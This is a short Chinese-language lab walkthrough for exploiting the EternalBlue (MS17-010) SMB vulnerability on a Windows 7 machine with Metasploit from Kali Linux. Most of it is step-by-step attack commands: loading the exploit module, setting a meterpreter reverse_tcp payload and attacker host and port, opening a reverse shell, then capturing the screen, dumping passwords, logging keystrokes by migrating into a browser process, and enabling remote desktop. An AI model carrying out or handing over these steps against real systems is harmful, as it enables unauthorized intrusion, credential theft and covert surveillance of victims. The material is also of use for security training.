永恆之藍(ms017-010)漏洞利用
1、實驗環境
靶機win7
地址:192.168.1.xxx
登錄密碼:xxxx
攻擊機:kail linux
地址:192.168.1.xxx
登錄用戶名:root
登錄密碼:xxx
2、實驗原理:
“永恆之藍”的原理主要是掃描所有開放445文件共享端口的Windows機器。
445端口簡介:
445端口是一個毀譽參半的端口,有了它我們可以在局域網中輕松訪問各種共享文件夾或共享打印機,但也正是因為有了它,黑客們才有了可乘之機,他們能通過該端口偷偷共享你的硬盤,甚至會在悄無聲息中將你的硬盤格式化掉! 2017年10月,由於病毒"壞兔子"來襲,國家互聯網應急中心等安全機構建議用戶及時關閉計算機以及網絡設備上的445和139端口 。
實驗步驟:
Step1:啟動msf
Step2:搜索search ms17-010模塊
發現目標靶機上存在永恆之藍漏洞。
Step3:加載攻擊模塊並配置參數
use exploit/windows/smb/ms17_010_eternalblue
setp4:設置payload(設置攻擊程序)
set payload windows/x64/meterpreter/reverse_tcp
setp5:設置相關參數
show options
set rhost 192.168.1.5 (靶機的IP)
set lhost 192.168.1.88 (發起攻擊的主機IP)
set lport 443 (監聽的端口)
Step6:發起攻擊,成功會反彈shell
輸入run或者exploit
Step7:獲取屏幕數據
Step8:獲取密碼
Step9:鍵盤監聽
ps 看瀏覽器或者記事本等進程號
migrate轉到相應的進程
(1) keyscan_start: 啟動時與如 Word 或瀏覽器的進程相關聯的鍵盤記錄軟件
(2) keyscan_dump 鍵盤記錄軟件的內容轉儲,此時可以看到剛剛在靶機上輸入的內容
(3) keyscan_stop: -停止鍵盤記錄軟件
step10:開啟遠程
(1)run post/windows/manage/enable_rdp,或run getgui -e
利用此后滲透模塊即可直接開啟遠程桌面
(2)KaliLinux操作系統中的rdesktop 靶機地址 命令即可直接使用root賬號登錄到靶機系統中